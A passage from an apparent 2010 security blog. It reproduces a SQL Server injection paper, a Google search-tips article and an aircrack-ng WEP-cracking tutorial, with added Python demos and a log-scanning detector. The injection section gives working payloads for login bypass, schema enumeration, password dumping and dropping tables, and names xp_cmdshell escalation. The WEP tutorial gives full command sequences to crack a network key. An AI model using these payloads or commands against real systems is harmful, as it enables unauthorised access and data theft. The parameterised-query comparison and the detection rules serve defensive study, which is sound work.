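    print("numeric field, no quotes:", lookup_user_vulnerable(db, NO_QUOTE_PAYLOAD))
    register_user(db, "admin'--", "password")
    change_password_vulnerable(db, "admin'--", "password", "pwned")
    print("admin's password is now:", get_password(db, "admin"))
```

The register/change-password pair is the shape to look for in a code review: escaping at the point of entry is not the same as escaping at the point of use, and any value that is later concatenated into SQL has to be treated as untrusted regardless of where it was read from.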

Sunday, June 6, 2010

Advanced SQL Injection In SQL Server Applications part 3

[Leveraging Further Access]
Once an attacker has control of the database, they are likely to want to use that access to obtain further control over the network. This can be achieved in a number of ways:
1. Using the xp_cmdshell extended stored procedure to run commands as the SQL server user, on the database server
2. Using the xp_regread extended stored procedure to read registry keys, potentially including the SAM (if SQL Server is running as the local system account)
3. Use other extended stored procedures to influence the server
4. Run queries on linked servers
5. Creating custom extended stored procedures to run exploit code from within the SQL Server process
6. Use the 'bulk insert' statement to read any file on the server
7. Use bcp to create arbitrary text files on the server
8. Using the sp_OACreate, sp_OAMethod and sp_OAGetProperty system stored procedures to create Ole Automation (ActiveX) applications that can do everything an ASP script can do
These are just a few of the more common attack scenarios; it is quite possible that an attacker will be able to come up with others. We present these techniques as a collection of relatively obvious SQL Server attacks, in order to show just what is possible, given the ability to inject SQL. We will deal with each of the above points in turn.
[xp_cmdshell]


Advanced SQL Injection In SQL Server Applications part 2

[Obtaining Information Using Error Messages]

This technique was first discovered by David Litchfield and the author in the course of a
penetration test; David later wrote a paper on the technique [1], and subsequent authors
have referenced this work. This explanation discusses the mechanisms underlying the
'error message' technique, enabling the reader to fully understand it, and potentially
originate variations of their own.

In order to manipulate the data in the database, the attacker will have to determine the
structure of certain databases and tables. For example, our 'users' table might have been
created with the following command:

create table users( id int,
                    username varchar(255),
                    password varchar(255),
                    privs int
                  )

..and had the following users inserted:

insert into users values( 0, 'admin', 'r00tr0x!', 0xffff )
insert into users values( 0, 'guest', 'guest', 0x0000 )
insert into users values( 0, 'chris', 'password', 0x00ff )
insert into users values( 0, 'fred', 'sesame', 0x00ff )

Let's say our attacker wants to insert a user account for himself. Without knowing the
structure of the 'users' table, he is unlikely to be successful. Even if he gets lucky, the
significance of the 'privs' field is unclear. The attacker might insert a '1', and give himself
a low - privileged account in the application, when what he was after was administrative
access.

Fortunately for the attacker, if error messages are returned from the application (the
default ASP behaviour) the attacker can determine the entire structure of the database,
and read any value that can be read by the account the ASP application is using to
connect to the SQL Server.

(The following examples use the supplied sample database and .asp scripts to illustrate
how these techniques work.)

First, the attacker wants to establish the names of the tables that the query operates on,
and the names of the fields. To do this, the attacker uses the 'having' clause of the 'select'
statement:

Username: ' having 1=1--

This provokes the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is
invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause. 

/process_login.asp, line 35 

So the attacker now knows the table name and column name of the first column in the
query. They can continue through the columns by introducing each field into a 'group by'
clause, as follows:

Username: ' group by users.id having 1=1--

(which produces the error…)

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username'
is invalid in the select list because it is not contained in either an
aggregate function or the GROUP BY clause. 

/process_login.asp, line 35 

Eventually the attacker arrives at the following 'username':

' group by users.id, users.username, users.password, users.privs having 1=1--

… which produces no error, and is functionally equivalent to:

select * from users where username = ''

So the attacker now knows that the query is referencing only the 'users' table, and is using
the columns 'id, username, password, privs', in that order.

It would be useful if he could determine the types of each column. This can be achieved
using a 'type conversion' error message, like this:

Username: ' union select sum(username) from users--

This takes advantage of the fact that SQL server attempts to apply the 'sum' clause before
determining whether the number of fields in the two rowsets is equal. Attempting to
calculate the 'sum' of a textual field results in this message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average
aggregate operation cannot take a varchar data type as an argument. 

/process_login.asp, line 35 

…which tells us that the 'username' field has type 'varchar'. If, on the other hand, we
attempt to calculate the sum() of a numeric type, we get an error message telling us that
the number of fields in the two rowsets doesn't match:

Username: ' union select sum(id) from users--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' 

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL
statement containing a UNION operator must have an equal number of
expressions in their target lists. 

/process_login.asp, line 35 

We can use this technique to approximately determine the type of any column of any
table in the database.

This allows the attacker to create a well-formed 'insert' query, like this:

Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff
)--

However, the potential of the technique doesn't stop there. The attacker can take advantage of any error message that reveals information about the environment, or the
database. A list of the format strings for standard error messages can be obtained by
running:

select * from master..sysmessages

Examining this list reveals some interesting messages.

One especially useful message relates to type conversion. If you attempt to convert a
string into an integer, the full contents of the string are returned in the error message. In
our sample login page, for example, the following 'username' will return the specific
version of SQL server, and the server operating system it is running on:

Username: ' union select @@version,1,1,1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug
6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise
Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of
data type int. 

/process_login.asp, line 35 

This attempts to convert the built-in '@@version' constant into an integer because the
first column in the 'users' table is an integer.

This technique can be used to read any value in any table in the database. Since the
attacker is interested in usernames and passwords, they are likely to read the usernames
from the 'users' table, like this:

Username: ' union select min(username),1,1,1 from users where username >
'a'--

This selects the minimum username that is greater than 'a', and attempts to convert it to an
integer:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'admin' to a column of data type int. 

/process_login.asp, line 35 

So the attacker now knows that the 'admin' account exists. He can now iterate through the
rows in the table by substituting each new username he discovers into the 'where' clause:

Username: ' union select min(username),1,1,1 from users where username >
'admin'--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'chris' to a column of data type int. 

/process_login.asp, line 35 

Once the attacker has determined the usernames, he can start gathering passwords:

Username: ' union select password,1,1,1 from users where username =
'admin'--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'r00tr0x!' to a column of data type int. 

/process_login.asp, line 35 

A more elegant technique is to concatenate all of the usernames and passwords into a
single string, and then attempt to convert it to an integer. This illustrates another point;
Transact-SQL statements can be strung together on the same line without altering their
meaning. The following script will concatenate the values:

begin declare @ret varchar(8000)
set @ret=':'
select @ret=@ret+' '+username+'/'+password from users where
username>@ret
select @ret as ret into foo
end

The attacker 'logs in' with this 'username' (all on one line, obviously…)

Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--

This creates a table 'foo', which contains the single column 'ret', and puts our string into it.
Normally even a low-privileged user will be able to create a table in a sample database, or
the temporary database.

The attacker then selects the string from the table, as before:

Username: ' union select ret,1,1,1 from foo--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int. 

/process_login.asp, line 35 

And then drops (deletes) the table, to tidy up:

Username: '; drop table foo--

These examples are barely scratching the surface of the flexibility of this technique.
Needless to say, if the attacker can obtain rich error information from the database, their
job is infinitely easier.
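The converse of the enumeration walk-through above is what a defender wants: recognising these probes in the application's own request logs before the error messages have done their work. The following is an added example, not code from the paper. It is Python; the IIS-style log lines are constructed for the example (the probe strings are the ones shown in the text, the log layout and the field names are assumptions), and each rule is named after the technique from the paper it matches.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log (not from the original page): one entry per request,
# with the form values URL-encoded as a browser sends them. The probes are the
# 'username' inputs shown in the text above; the layout is an assumption.
SAMPLE_LOG = """\
2010-06-04 10:00:01 POST /process_login.asp username=fred&password=sesame 200
2010-06-04 10:00:07 POST /process_login.asp username=%27+having+1%3D1--&password= 500
2010-06-04 10:00:12 POST /process_login.asp username=%27+group+by+users.id+having+1%3D1--&password= 500
2010-06-04 10:00:20 POST /process_login.asp username=%27+union+select+%40%40version%2C1%2C1%2C1--&password= 500
2010-06-04 10:00:31 POST /process_login.asp username=%27+union+select+min%28username%29%2C1%2C1%2C1+from+users+where+username+%3E+%27a%27--&password= 500
2010-06-04 10:00:45 POST /process_login.asp username=o%27brien&password=x 200
2010-06-04 10:01:02 POST /process_login.asp username=%27%3B+drop+table+foo--&password= 500
"""

# Each rule is matched against the decoded, lower-cased, whitespace-collapsed
# parameter value, so URL encoding and padding spaces do not hide the probe.
# A lone single quote is deliberately not a rule: names like o'brien are legal.
RULES = [
    ("schema enumeration via HAVING", re.compile(r"\bhaving\s+1\s*=\s*1")),
    ("column enumeration via GROUP BY", re.compile(r"\bgroup\s+by\b")),
    ("error-based read via UNION", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("server fingerprint (@@version)", re.compile(r"@@version")),
    ("stacked DDL/DML", re.compile(r";\s*(drop|insert|create|delete)\b")),
    ("comment truncation", re.compile(r"--\s*$")),
]

LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<method>\S+) (?P<path>\S+) (?P<qs>\S*) (?P<status>\d{3})$"
)


def normalise(value: str) -> str:
    """Decode URL encoding, collapse whitespace and lower-case the value."""
    return re.sub(r"\s+", " ", unquote_plus(value)).strip().lower()


def scan_line(line: str):
    """Return (timestamp, status, [(param, [rule names])]) for a suspicious
    request, or None when no parameter matches any rule."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    hits = []
    for pair in m.group("qs").split("&"):
        name, _, raw = pair.partition("=")
        value = normalise(raw)
        matched = [label for label, rx in RULES if rx.search(value)]
        if matched:
            hits.append((name, matched))
    if not hits:
        return None
    return m.group("ts"), m.group("status"), hits


def scan_log(text: str):
    """Run scan_line over every line and keep only the flagged requests."""
    return [r for r in (scan_line(line) for line in text.splitlines()) if r]


if __name__ == "__main__":
    for ts, status, hits in scan_log(SAMPLE_LOG):
        print(ts, status, hits)
```

Two things the sample makes visible: matching has to happen on the decoded value, because `%27+having+1%3D1--` never contains the string `having 1=1`; and every flagged request here finished with a 500, which is what "error messages are returned from the application" looks like from the server side, so a burst of 500s on the login handler is a cheap second signal to correlate with.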

Friday, June 4, 2010

Advanced SQL Injection In SQL Server Applications part 1

[Abstract]
This document discusses in detail the common 'SQL injection' technique, as it applies to the popular Microsoft Internet Information Server/Active Server Pages/SQL Server platform. It discusses the various ways in which SQL can be 'injected' into the application and addresses some of the data validation and database lockdown issues that are related to this class of attack.
The paper is intended to be read by both developers of web applications which communicate with databases and by security professionals whose role includes auditing these web applications.
[Introduction]
Structured Query Language ('SQL') is a textual language used to interact with relational databases. There are many varieties of SQL; most dialects that are in common use at the moment are loosely based around SQL-92, the most recent ANSI standard. The typical unit of execution of SQL is the 'query', which is a collection of statements that typically return a single 'result set'. SQL statements can modify the structure of databases (using Data Definition Language statements, or 'DDL') and manipulate the contents of databases (using Data Manipulation Language statements, or 'DML'). In this paper, we will be specifically discussing Transact-SQL, the dialect of SQL used by Microsoft SQL Server.
SQL Injection occurs when an attacker is able to insert a series of SQL statements into a 'query' by manipulating data input into an application.
A typical SQL statement looks like this:
select id, forename, surname from authors
This statement will retrieve the 'id', 'forename' and 'surname' columns from the 'authors' table, returning all rows in the table. The 'result set' could be restricted to a specific 'author' like this:
select id, forename, surname from authors where forename = 'john' and surname = 'smith'
An important point to note here is that the string literals 'john' and 'smith' are delimited with single quotes. Presuming that the 'forename' and 'surname' fields are being gathered from user-supplied input, an attacker might be able to 'inject' some SQL into this query, by inputting values into the application like this:
Forename: jo'hn
Surname: smith
The 'query string' becomes this:
select id, forename, surname from authors where forename = 'jo'hn' and surname = 'smith'
When the database attempts to run this query, it is likely to return an error:
Server: Msg 170, Level 15, State 1, Line 1
Line 1: Incorrect syntax near 'hn'.
The reason for this is that the insertion of the 'single quote' character 'breaks out' of the single-quote delimited data. The database then tried to execute 'hn' and failed. If the attacker specified input like this:
Forename: jo'; drop table authors--
Surname:
…the authors table would be deleted, for reasons that we will go into later.
It would seem that some method of either removing single quotes from the input, or 'escaping' them in some way would handle this problem. This is true, but there are several difficulties with this method as a solution. First, not all user-supplied data is in the form of strings. If our user input could select an author by 'id' (presumably a number) for example, our query might look like this:
select id, forename, surname from authors where id=1234
In this situation an attacker can simply append SQL statements on the end of the numeric input. In other SQL dialects, various delimiters are used; in the Microsoft Jet DBMS engine, for example, dates can be delimited with the '#' character. Second, 'escaping' single quotes is not necessarily the simple cure it might initially seem, for reasons we will go into later.
We illustrate these points in further detail using a sample Active Server Pages (ASP) 'login' page, which accesses a SQL Server database and attempts to authenticate access to some fictional application.
This is the code for the 'form' page, into which the user types a username and password:

The critical point here is the part of 'process_login.asp' which creates the 'query string' :
var sql = "select * from users where username = '" + username + "' and password = '" + password + "'";
If the user specifies the following:
Username: '; drop table users--
Password:
…the 'users' table will be deleted, denying access to the application for all users. The '--' character sequence is the 'single line comment' sequence in Transact-SQL, and the ';' character denotes the end of one query and the beginning of another. The '--' at the end of the username field is required in order for this particular query to terminate without error.
The attacker could log on as any user, given that they know the users name, using the following input:
Username: admin'--
The attacker could log in as the first user in the 'users' table, with the following input:
Username: ' or 1=1--
…and, strangely, the attacker can log in as an entirely fictional user with the following input:
Username: ' union select 1, 'fictional_user', 'some_password', 1--
The reason this works is that the application believes that the 'constant' row that the attacker specified was part of the recordset retrieved from the database.
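To set the hardened query beside the vulnerable one from 'process_login.asp', here is an added example; it is not the paper's code and not ASP. It is Python, with an in-memory sqlite3 database standing in for SQL Server (an assumption made so it runs offline); the rows are the paper's sample 'users' table, and the inputs are the three 'username' values discussed above plus the 'jo'hn' case from the introduction.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Assumption: an in-memory sqlite3 database stands in for SQL Server.
    The rows are the sample 'users' table from the paper."""
    db = sqlite3.connect(":memory:")
    db.execute("create table users (id integer, username text, password text, privs integer)")
    db.executemany("insert into users values (?, ?, ?, ?)", [
        (0, "admin", "r00tr0x!", 0xffff),
        (0, "guest", "guest", 0x0000),
        (0, "chris", "password", 0x00ff),
        (0, "fred", "sesame", 0x00ff),
    ])
    return db


def login_concat(db, username: str, password: str):
    """The process_login.asp pattern: the query text is built by string
    concatenation, so the input is parsed as SQL. Deliberately vulnerable.
    Returns the username of the first matching row, or None."""
    sql = ("select * from users where username = '" + username +
           "' and password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[1] if row else None


def login_param(db, username: str, password: str):
    """Hardened form: the SQL text is a constant and the values travel as
    parameters, so a quote, '--' or ';' in the input is only data to compare."""
    row = db.execute("select * from users where username = ? and password = ?",
                     (username, password)).fetchone()
    return row[1] if row else None


def concat_error_text(db, username: str, password: str):
    """What the default ASP behaviour leaks: the database's own error message
    for a broken concatenated query (None when the query parsed)."""
    try:
        login_concat(db, username, password)
        return None
    except sqlite3.Error as exc:
        return str(exc)


def safe_login(db, username: str, password: str):
    """Parameterised query plus a catch-all, so the client never sees the
    database error text; the exception belongs in a server-side log instead."""
    try:
        return login_param(db, username, password)
    except sqlite3.Error:
        return None


if __name__ == "__main__":
    db = make_db()
    for user in ("admin'--", "' or 1=1--",
                 "' union select 1, 'fictional_user', 'some_password', 1--"):
        print(repr(user), "concat:", login_concat(db, user, ""),
              "param:", login_param(db, user, ""))
    print("jo'hn ->", concat_error_text(db, "jo'hn", "x"))
```

The three inputs from the text log in through `login_concat` (the union one as the fictional user, because UNION only needs matching column counts, in sqlite as in SQL Server) and all fail through `login_param`. The '; drop table users--' input is not reproduced because Python's sqlite3 refuses a second statement after ';' in one `execute` call; the ODBC path in the paper has no such restriction, which is exactly why the parameterised form, not the driver, has to be the defence.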

Tuesday, June 1, 2010

20 Great Google Secrets

http://www.pcmag.com/article2/0,4149,1306756,00.asp




Google is clearly the best general-purpose search engine on the Web (see www.pcmag.com/searchengines).

But most people don't use it to its best advantage. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google's index, it's still a struggle to pare results to a manageable number.

But Google is a remarkably powerful tool that can ease and enhance your Internet exploration. Google's search options go beyond simple keywords, the Web, and even its own programmers. Let's look at some of Google's lesser-known options.

Syntax Search Tricks

Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Google has a fairly complete list of its syntax elements at www.google.com/help/operators.html. Here are some advanced operators that can help narrow down your search results.

Intitle: at the beginning of a query word or phrase (intitle:"Three Blind Mice") restricts your search results to just the titles of Web pages.

Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you're searching for might commonly appear in URLs. If you're looking for the term HTML, for example, and you don't want to get results such as www.mysite.com/index.html, you can enter intext:html.

Link: lets you see which pages are linking to your Web page or to another page you're interested in. For example, try typing in link:http://www.pcmag.com

Try using site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:"Mark Twain"site:edu. Experiment with mixing various elements; you'll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.

Swiss Army Google

Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature (www.google.com/help/features.html#calculator) lets you do both math and a variety of conversions from the search box. For extra fun, try the query "Answer to life the universe and everything."

Let Google help you figure out whether you've got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try "thre blund mise") and Google may suggest a proper spelling. This doesn't always succeed; it works best when the word you're searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you're searching for "three blind mice," underneath the search window will appear a statement such as Searched the web for "three blind mice.") You'll discover that you can click on each word in your search phrase and get a definition from a dictionary.

Suppose you want to contact someone and don't have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you'll see it at the top of the search results along with a map link to the address. If you'd rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you'd rather use a search form for business phone listings, try Yellow Search (www.buzztoolbox.com/google/yellowsearch.shtml).

Extended Googling

Google offers several services that give you a head start in focusing your search. Google Groups (http://groups.google.com) indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools: Froogle (http://froogle.google.com), which indexes products from online stores, and Google Catalogs (http://catalogs.google.com), which features products from more than 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google's tools and services at www.google.com/options/index.html

You're probably used to using Google in your browser. But have you ever thought of using Google outside your browser?

Google Alert (www.googlealert.com) monitors your search terms and e-mails you information about new additions to Google's Web index. (Google Alert is not affiliated with Google; it uses Google's Web services API to perform its searches.) If you're more interested in news stories than general Web content, check out the beta version of Google News Alerts (www.google.com/newsalerts). This service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)

Google on the telephone? Yup. This service is brought to you by the folks at Google Labs (http://labs.google.com), a place for experimental Google ideas and features (which may come and go, so what's there at this writing might not be there when you decide to check it out). With Google Voice Search (http://labs1.google.com/gvs.html), you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don't expect 100 percent success.

In 2002, Google released the Google API (application programming interface), a way for programmers to access Google's search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you'll need an API key, which is available free from www.google.com/apis. See the figures for two more examples, and visit www.pcmag.com/solutions for more.

Thanks to its many different search properties, Google goes far beyond a regular search engine. Give the tricks in this article a try. You'll be amazed at how many different ways Google can improve your Internet searching.


Online Extra: More Google Tips


Here are a few more clever ways to tweak your Google searches.

Search Within a Timeframe

Daterange: (start date–end date). You can restrict your searches to pages that were indexed within a certain time period. Daterange: searches by when Google indexed a page, not when the page itself was created. This operator can help you ensure that results will have fresh content (by using recent dates), or you can use it to avoid a topic's current-news blizzard and concentrate only on older results. Daterange: is actually more useful if you go elsewhere to take advantage of it, because daterange: requires Julian dates, not standard Gregorian dates. You can find converters on the Web (such as http://aa.usno.navy.mil/data/docs/JulianDate.html), but an easier way is to do a Google daterange: search by filling in a form at www.researchbuzz.com/toolbox/goofresh.shtml or www.faganfinder.com/engines/google.shtml.

If one special syntax element is good, two must be better, right? Sometimes. Though some operators can't be mixed (you can't use the link: operator with anything else) many can be, quickly narrowing your results to a less overwhelming number.

More Google API Applications

Staggernation.com offers three tools based on the Google API. The Google API Web Search by Host (GAWSH) lists the Web hosts of the results for a given query (www.staggernation.com/gawsh/). When you click on the triangle next to each host, you get a list of results for that host. The Google API Relation Browsing Outliner (GARBO) is a little more complicated: You enter a URL and choose whether you want pages that are related to the URL or linked to the URL (www.staggernation.com/garbo/). Click on the triangle next to a URL to get a list of pages linked or related to that particular URL. CapeMail is an e-mail search application that allows you to send an e-mail to google@capeclear.com with the text of your query in the subject line and get the first ten results for that query back. Maybe it's not something you'd do every day, but if your cell phone does e-mail and doesn't do Web browsing, this is a very handy address to know.

Monday, May 31, 2010

Tutorial: Crack WEP with aircrack + inject packets (WINDOWS)


Okay this is my first tutorial so go easy on me.
This is a tutorial for cracking WEP and injecting packets for networks with no clients. You'll be able to do so on a windows platform (tested in VISTA and works)!
-------------------------------------------------------------------------------------------
- Next step is to download this .dll file (again only commview driver users):
http://darkircop.org/commview.dll (you have it in folder „TOOLS“)

- Next up, download the aircrack package. Download it here:
http://www.aircrack-ng.org/ (you have it in folder „TOOLS“)


unzip the file to your c:\ drive (it can be another drive but this is the easiest)

put the commview.dll file you just downloaded in the folder you extracted (it's called aircrack and if you extracted it to your c: drive like I said it should be in c:\aircrack\)

Now go to you place where you installed Commview in (the program itself) and look for a file called "ca2k.dll" (default install dir is c:\program files\commview for wifi\)

Copy this file to the same folder as the commview.dll (c:\aircrack\)

OKAY that was a whole lot! this was just to get everything ready! If you did all of this correct you'll be able to move to the next step!
-------------------------------------------------------------------------------------------
THE CRACKING:
Step 1:
- Open a command prompt (start > run > cmd.exe)
Step 2:
- type the following in the command prompt:
cd c:\aircrack\

- HIT ENTER
Step 3:
- type the following in the same command prompt:
airserv-ng -d commview.dll

- HIT ENTER
- You should see something like this coming up in the command prompt
Opening card commview.dll
Setting chan 1
Opening sock port 666
Serving commview.dll chan 1 on port 666

Step 4:
- Open a new command prompt (LEAVE THE PREVIOUS ONE OPEN AT ALL TIMES!!)
- Type the following in the new command prompt:
cd c:\aircrack\

-HIT ENTER
Step 5:
- Now type this in the same command prompt:
airodump-ng 127.0.0.1:666

- HIT ENTER
note: if you know what channel the to-monitor-network is on you can make it this. I recommend this!:
airodump-ng --channel YOURCHANNELNUMBER HERE 127.0.0.1:666


Airodump-ng should start capturing data from the networks on the given channel now, you'll notice it isn't going fast (except if it's a big company's network or something). We are going to speed this process up!
Take a note of the following:
1: BSSID of the network you want to crack = MAC address.
2: ESSID of the network you want to crack = name of the network (example: wifi16, mynetwork,...)
3: The mac of the card you are using to monitor the packets
LEAVE THE 2 COMMAND PROMPTS YOU ALREADY HAVE OPEN OPEN!!!
Step 6:
- Open a new command prompt
- Type in the following:
cd c:\aircrack\

- HIT ENTER
Step 7:
- Type in the following in command prompt:
aireplay-ng -1 0 -e ESSID-OF-THE-NETWORK-YOU-WANT-TO-CRACK -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666

yes quite confusing so a quick example:
ESSID = wifi16
BSSID = 11:22:33:44:55:66
MAC OF CARD I'M USING = 01:23:45:67:89:01

so that will get me:
aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666


if all goes well you'll get this as the outcome:
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful


if you get:
AP rejects the source MAC address

It means MAC filtering is enabled on the network you want to crack and you'll need to get hold of a mac address that's allowed access.

if you keep getting:
sending authentication request

Try moving closer to the AP!
Step 8:
in the same command prompt as the one in step 7 type:
aireplay-ng -5 -b BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666

yes quite confusing once again so a quick example:
BSSID = 11:22:33:44:55:66
MAC OF CARD I'M USING = 01:23:45:67:89:01

so that will get me:
aireplay-ng -5 -b 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666


if all goes well you'll get this:
Waiting for a data packet...
Read #number packets...


Step 9:

if you wait a little bit you'll soon be prompted with a packet like this:

Size: 120, FromDS: 1, ToDS: 0 (WEP)

BSSID = the bssid
Dest. MAC = the dest mac
Source MAC = the source mac

0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 .B..........l~@.
0x0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ....4...@...+bz.
0x0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm.......o..Sdn.
0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI.....'.. 0.
0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p...YS.4W'.l....
0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf...G-&.9W.)..
0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q.D...w.....
0x0070: 0505 933f af2f 740e ...?./t.

Use this packet ?

note: size can vary, I always pressed in y and it worked
- press in Y
- HIT ENTER

You should see something like this coming up (or similar):
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in
fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Note 1: It doesn't need to be 1500 bytes!!
Note 2: Note the keystream filename printed above (fragment-0124-161129.xor in this run); you're going to need this file!

AGAIN DON'T CLOSE THIS COMMAND PROMPT!!

if you keep getting:
Data packet found!
Sending fragmented packet
No answer, repeating...
Trying a LLC NULL packet
Sending fragmented packet
No answer, repeating...
Sending fragmented packet
...

Just keep trying! It automatically starts over again (moving closer to the AP has been reported to help.)



anyways, if you got the bytes of keystream (everything worked) it's time for the next step!
Step 10:
- Press CTRL + C in the command prompt used in step 8
- Now type in the following:
packetforge-ng -0 -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR -k 192.168.1.100 -l (= an ELL not a 1) 192.168.1.1 -y fragment-0124-161129.xor -w arp-request


Remember the keystream file from part 8 (fragment-0124-161129.xor, the name printed in step 9)? Put that same filename after -y here.
The name after -w (arp-request here) is the filename used to save the packet; you can choose whatever you want, but you must use this filename in the upcoming steps!
Step 11:
Now that we've got our ARP REQ packet we can start injecting!
Here's how to do this.
- Go to the command prompt used in step 9
- Type in the following:
aireplay-ng -2 -r arp-request 127.0.0.1:666

arp-request after -r is once again the filename you chose in step 10!

You should now see something like this coming up:
Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0F:B5:AB:CB:9D

0x0000: 0841 0201 0014 6c7e 4080 000f b5ab cb9d .A....l~@.......
0x0010: ffff ffff ffff 8001 6c48 0000 0999 881a ........lH......
0x0020: 49fc 21ff 781a dc42 2f96 8fcc 9430 144d I.!.x..B/....0.M
0x0030: 3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1 :.....gC.V$.....
0x0040: d64f b709 .O..

Use this packet ?

- Type in Y
- HIT ENTER

This should come up now:
Saving chosen packet in replay_src-0124-163529.cap
You should also start airodump-ng to capture replies.
End of file.

sent #numberOfPackets ... (#number pps)

You'll see the numberOfPackets rising really fast, you are injecting these packets now.
Step 12:
Now go back to the command prompt where you had airodump-ng in open
and press CTRL + C
now type in the following:
airodump-ng --channel CHANNELYOUWANTTOCAPTUREFROM --write Filename 127.0.0.1:666

Note: Filename = The name of the file where the data packets are saved, this will be used in the next step

If all goes correctly you should be capturing as many packets per second as you are injecting (maybe even more).
Step 13:
when you think you have enough...
note: 200000 min for 64bit (just capture 1Million to be sure)
...press CTRL + C in the command prompt that has airodump-ng running and enter the following:
aircrack-ng -n 64 Filename.cap

note:
Filename = see previous step
64 = the bit depth of the key (128 for 128bit etc...)


and if it goes like planned a message will pop-up saying:
KEY FOUND: YourKey


That's it! I hope this was helpful, any question/remarks/complaints please ask/tell and I'll try to help/respond as soon as possible!!
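The frame dumps printed in steps 9 and 11 are easier to reason about once the 802.11 header is decoded. The following is an added example, not part of the tutorial and not aircrack-ng code: a Python parser that turns the dump text back into bytes and reads the frame-control flags, the three addresses and the WEP IV, which is the same decode a wireless IDS or Wireshark performs to label a frame FromDS/ToDS and protected. The two dumps are copied from the tutorial output above; the ASCII gutter on the right of each line is ignored.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Copied from the aireplay-ng output shown in steps 9 and 11 of the tutorial.
DUMP_STEP9 = """\
0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 .B..........l~@.
0x0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ....4...@...+bz.
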